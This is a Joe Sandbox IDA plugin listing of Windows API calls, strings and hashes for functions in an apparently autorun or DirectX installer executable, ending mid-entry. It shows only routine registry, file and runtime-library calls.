                                                                                                                                              • API String ID: 238394327-2432022147
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • RegOpenKeyExA.ADVAPI32 ref: 0041653A
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Version,00000000,00000000,?,00000100), ref: 00416562
                                                                                                                                              Strings
                                                                                                                                              • SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}, xrefs: 00416525
                                                                                                                                              • Version, xrefs: 00416554
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$AddressLibraryLoadOpenPathProcQuerySystemTempValueWindows
                                                                                                                                              • String ID: SOFTWARE\Microsoft\Active Setup\Installed Components\{D27CDB6E-AE6D-11cf-96B8-444553540000}$Version
                                                                                                                                              • API String ID: 3927907489-1332029265
                                                                                                                                              • Opcode ID: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                                              • Instruction ID: 2c3280e8fd186b36745d7fe58343f886ef13101444831185cebde92ec6972ae0
                                                                                                                                              • Opcode Fuzzy Hash: 9252eca1604ed86113a6410666951e3d9899bb3435c16dbf6c7682639952dafd
                                                                                                                                              • Instruction Fuzzy Hash: 5E21F371148341AFD314CF14C851BEBB7E8FB99744F104A1DF5A9832D0EB78A548CB56
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414EF1
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414F00
                                                                                                                                              • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414F0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseDirectoryFileNextRemove
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 2004183241-1173974218
                                                                                                                                              • Opcode ID: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                                              • Instruction ID: 9c89db226a464595a1456a08dba5ac67963ce04dc153f15b353361ca2e9a56d0
                                                                                                                                              • Opcode Fuzzy Hash: ac6806ff917ffb584945b3d21e5ba2d1ccc03283bf577d30b185a3c62fe6ba3e
                                                                                                                                              • Instruction Fuzzy Hash: F711EB751087828BC721CB28A8547EBFBD9FFD6306F144929EDC587301DB35A889C755
                                                                                                                                              APIs
                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B9A
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00416BB6
                                                                                                                                              • MessageBoxA.USER32(00000000,?,DirectX Error,00000000), ref: 00416BCC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$ErrorFormatLast
                                                                                                                                              • String ID: DirectX Error
                                                                                                                                              • API String ID: 3971115935-1449601957
                                                                                                                                              • Opcode ID: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                                              • Instruction ID: 00734949432f92e12728b15547f2c9266f1449dcf60645d6a7a156eb7abf3a75
                                                                                                                                              • Opcode Fuzzy Hash: e42ac2ce9476a126deb7f06afa875e21e8b1d8dd5084b04630a3d7ee1d926943
                                                                                                                                              • Instruction Fuzzy Hash: 9F018071304310ABE710DFA59C49F6B77ACEF86B15F11852DFA00CA280D674E8008669
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00424B26), ref: 0042C2D9
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042C2E9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                                              • Opcode ID: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                                              • Instruction ID: 3010c939291e915eff1eb01b3b571670853061f70a44e764dbecd71da3a81d10
                                                                                                                                              • Opcode Fuzzy Hash: 02faec45ebebc9ea8088bb5ac7c7d7aefd1fe9434e9aaf4371285750a670add2
                                                                                                                                              • Instruction Fuzzy Hash: C2F01D30F40A1DD2DB001BE0BD4A26FBB78BB92746F9105E1D891A0094DF7884B4C25E
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,0044EAE0,00000010,004297E9,00000000,00000FA0,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00431821
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 00431831
                                                                                                                                              Strings
                                                                                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 0043182B
                                                                                                                                              • kernel32.dll, xrefs: 0043181C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                                                              • API String ID: 1646373207-3733552308
                                                                                                                                              • Opcode ID: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                                              • Instruction ID: 4a45933a82aeb79599459cbe0f8cef8bbb669c532bc06b3cb3151a140fe0d406
                                                                                                                                              • Opcode Fuzzy Hash: 7e93898ae70dbf0739adb7c3265fadd24f6ff0e0cb512f9bb8f0251e16c97f3e
                                                                                                                                              • Instruction Fuzzy Hash: 32F09A70640306AADB54AFA69C0679E3AA0BB08349F20983EE411E52B0DFBCC5108B1D
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000400,?), ref: 004312F8
                                                                                                                                              • GetLastError.KERNEL32 ref: 00431302
                                                                                                                                              • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 004313CB
                                                                                                                                              • GetLastError.KERNEL32 ref: 004313D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                              • Opcode ID: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                                              • Instruction ID: 191bc55e6a285dc79099745201b46e499ca68c129fd5b025dbec7fdafe6e4a6e
                                                                                                                                              • Opcode Fuzzy Hash: fc517802bf9863005fcb3632d1bfaa85c075bd97ca757f21effb5126a677eff1
                                                                                                                                              • Instruction Fuzzy Hash: 6F61D930604385DFDB21CF58C884B9A7BF4BF1A304F14559BE8618B3A2D778D946CB1A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00408060: VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                                • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                                                • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004016EA
                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 004017C4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep$FreeHeapProtectVirtual__lock
                                                                                                                                              • String ID: DXInstalled = %d$InstallDirectXIfRequired
                                                                                                                                              • API String ID: 715370876-4124889539
                                                                                                                                              • Opcode ID: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                                              • Instruction ID: 364755a666ca341e749ee64d0003a40c6949535c43a42a4e9d33c4ab1bb0a936
                                                                                                                                              • Opcode Fuzzy Hash: bdc4443d0d3ec1e238e24dd1fd3f35842bfbf80ed1653aedad27dd03790dd8a6
                                                                                                                                              • Instruction Fuzzy Hash: E851C4716487006BD300EB94FC42FAB3BA9AB85706F04847EFD44A72D3DA79D5048B6E
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0042C8FC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                                              • Instruction ID: 8280d1e270eca7936ff5276bf182434933e20333d3727ff594148b0d188492fc
                                                                                                                                              • Opcode Fuzzy Hash: 72ef37e3f52f69ed0ec66c4e8790f2510e5f96e623d6d1493fedeb9f51a5ca00
                                                                                                                                              • Instruction Fuzzy Hash: 48517FB1A04268DFDB22DFA9EC80BEDBBB8FF46304F50411AE8559B252DB345A41CF15
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 00428705
                                                                                                                                                • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                                              • __lock.LIBCMT ref: 00428751
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000008C,0044CD58,00000014,00432A14,?,?,00000000), ref: 0042879B
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0000008C), ref: 004287A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Enter__lock$Leave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 885841014-0
                                                                                                                                              • Opcode ID: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                                              • Instruction ID: b3503f7208acb3f95ac1f212b98e40c77cfa49c85add1a9a95d8a4e58ead19da
                                                                                                                                              • Opcode Fuzzy Hash: a01da40aeaf7a3bb659276398149747342c523524fdf739e22d43d76ee2309d8
                                                                                                                                              • Instruction Fuzzy Hash: 98411771A023228AD710AF65EC4576E7BA0AF41324FA4862FD121962D1DF7C9541CB1C
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,?,?), ref: 00417386
                                                                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 004173B1
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 004173C1
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004173CE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseDeleteEnumOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4142876296-0
                                                                                                                                              • Opcode ID: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                                              • Instruction ID: 816ecf25c106d77b39d132cd8e82fa92df93f4f8198aa37a08063b162ff1abf5
                                                                                                                                              • Opcode Fuzzy Hash: e88a5e974ed7bd7e7be99ffb565bc9357ecc90e66e98b9816a88c69fb15ff6d6
                                                                                                                                              • Instruction Fuzzy Hash: EA016DB6204201AFE320CB54DC49FEBB7ACEB89B04F00852DBA95D2151D6749804CBA6
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___addl
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2260456530-0
                                                                                                                                              • Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                                              • Instruction ID: 9a3622a891a97d8ac40710fbd079e3f9d72052691bd83aec0a43e73614e04fb6
                                                                                                                                              • Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
                                                                                                                                              • Instruction Fuzzy Hash: CAF0F032400606BFCB225F02DC01EA3B7EDFF19301F04142AFD698A131E722EA69CB51
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: %c:\$common_filelist.txt
                                                                                                                                              • API String ID: 1611563598-3546436211
                                                                                                                                              • Opcode ID: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                                              • Instruction ID: 075e01302480f862047a0cd229708d3c32eb167a873184b3eb99f0da593a5d69
                                                                                                                                              • Opcode Fuzzy Hash: bf4860426ae5a8c665500b95706d3b05aabf3409a8e98bf8efb5ed0b0f1f40b4
                                                                                                                                              • Instruction Fuzzy Hash: 2E815FB16043406AD320EB659C41FFB77D89F85304F44482FFA8593292EB7CD949CB6A
                                                                                                                                              APIs
                                                                                                                                              • GetUserDefaultLangID.KERNEL32 ref: 0040F3C8
                                                                                                                                              Strings
                                                                                                                                              • No Languages Selected!, xrefs: 0040F3B5
                                                                                                                                              • Corrupted AutoRun.CFG File, xrefs: 0040F3B0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DefaultLangUser
                                                                                                                                              • String ID: Corrupted AutoRun.CFG File$No Languages Selected!
                                                                                                                                              • API String ID: 768647712-574851024
                                                                                                                                              • Opcode ID: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                                              • Instruction ID: 53668502b466ec9360e6261e60baa1c822bb85f3723ac8f7f48d7bf6175b14eb
                                                                                                                                              • Opcode Fuzzy Hash: d9ad3f59bbd157dacd61f4ff9f055d84f5177f32f5bf328f948fb3637ce815af
                                                                                                                                              • Instruction Fuzzy Hash: BA4104319047525BC736CB3C8444267FB91AF96314F0982BBDC94ABB92C334A94EC784
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Info
                                                                                                                                              • String ID: $
                                                                                                                                              • API String ID: 1807457897-3032137957
                                                                                                                                              • Opcode ID: f62c9546a7172f50e4f73095ef02771184208bba8ed88dd7c2354f7363845b2c
                                                                                                                                              • Instruction ID: 7ce7dcbe67f11c731291b5b1965c876956d7d29a79eba9a73914ef292cf8c08b
                                                                                                                                              • Opcode Fuzzy Hash: f62c9546a7172f50e4f73095ef02771184208bba8ed88dd7c2354f7363845b2c
                                                                                                                                              • Instruction Fuzzy Hash: 35417D302012685EEB118764ED99BFF7BD8DB02704F640CEAE645D7152CB684E89D79C
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,00446A11,00000001), ref: 004118EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: %c:\$common_filelist.txt
                                                                                                                                              • API String ID: 1611563598-3546436211
                                                                                                                                              • Opcode ID: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                                              • Instruction ID: 6025519ab524a28bed39fbe42f5c2c1978188ea60c5d789c7bac0d9d67ab69ce
                                                                                                                                              • Opcode Fuzzy Hash: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                                              • Instruction Fuzzy Hash: A6412BB15043446AD320EBA09C41FEB77989F85705F44481FFB44562C2FBBCE645CB6A
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0042B00F
                                                                                                                                              • __lock.LIBCMT ref: 0042B040
                                                                                                                                                • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                                                • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __lock$FreeHeap
                                                                                                                                              • String ID: @bE
                                                                                                                                              • API String ID: 743385489-3735480552
                                                                                                                                              • Opcode ID: e9b2ec0dc0123e412d69c5196f3f427e9980556b1049e712b9c385e69edacffc
                                                                                                                                              • Instruction ID: 731fc6a72e954c2201cc3ad4f1ba7e74df98332f7485061ff758e95a60e6a6fe
                                                                                                                                              • Opcode Fuzzy Hash: e9b2ec0dc0123e412d69c5196f3f427e9980556b1049e712b9c385e69edacffc
                                                                                                                                              • Instruction Fuzzy Hash: D73191717006209BC626AB69F54591FB3B5EF44718BE9094FE510DB292DB3EEC80CA5C
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __getbuf
                                                                                                                                              • String ID: hE$@hE
                                                                                                                                              • API String ID: 554500569-3527237109
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 0040F818
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 626452242-3916222277
                                                                                                                                              APIs
                                                                                                                                              • GetClassInfoA.USER32(?,-0000007C,?), ref: 004384AF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassInfo
                                                                                                                                              • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                                              • API String ID: 3534257612-2801496823
                                                                                                                                              APIs
                                                                                                                                              • GetFileType.KERNEL32(?,?,?,0044CD70,00000010), ref: 0042888B
                                                                                                                                              • GetLastError.KERNEL32(?,?,0044CD70,00000010), ref: 00428895
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastType
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 1621975986-2766056989
                                                                                                                                              APIs
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040F5D8
                                                                                                                                              • GetVolumeInformationA.KERNEL32 ref: 0040F608
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorInformationLastVolume
                                                                                                                                              • String ID: CDFS
                                                                                                                                              • API String ID: 2466915109-2335696158
                                                                                                                                              • Opcode ID: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                                              • Instruction ID: 0ba698df5349420569fcb0b07cbe6f9900faa6667f1b351f96fad5a35dfb1ad2
                                                                                                                                              • Opcode Fuzzy Hash: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                                              • Instruction Fuzzy Hash: EC1127766042016BE711CB58DC05BD7BBE4ABD5300F04C87DF58457181EAB4994DC763
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseExitHandleThread
                                                                                                                                              • String ID: m:B
                                                                                                                                              • API String ID: 3411751092-37060516
                                                                                                                                              • Opcode ID: 80a6baf8b596835e4e6d2e0790cb893599dbd790eb416e0551c22c3cf0ec0443
                                                                                                                                              • Instruction ID: 38546fa7c7f44993b21125da49d9b9c894fd7afa0086638ea366401a8295a73f
                                                                                                                                              • Opcode Fuzzy Hash: 80a6baf8b596835e4e6d2e0790cb893599dbd790eb416e0551c22c3cf0ec0443
                                                                                                                                              • Instruction Fuzzy Hash: B4E02C30300A3017C23237B8BC09B3E6284AF02720FC5061AF864CA2C0CF6CCC0041AE
                                                                                                                                              APIs
                                                                                                                                              • RegCloseKey.ADVAPI32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041752A
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041754B
                                                                                                                                              Strings
                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417520
                                                                                                                                              Memory Dump Source
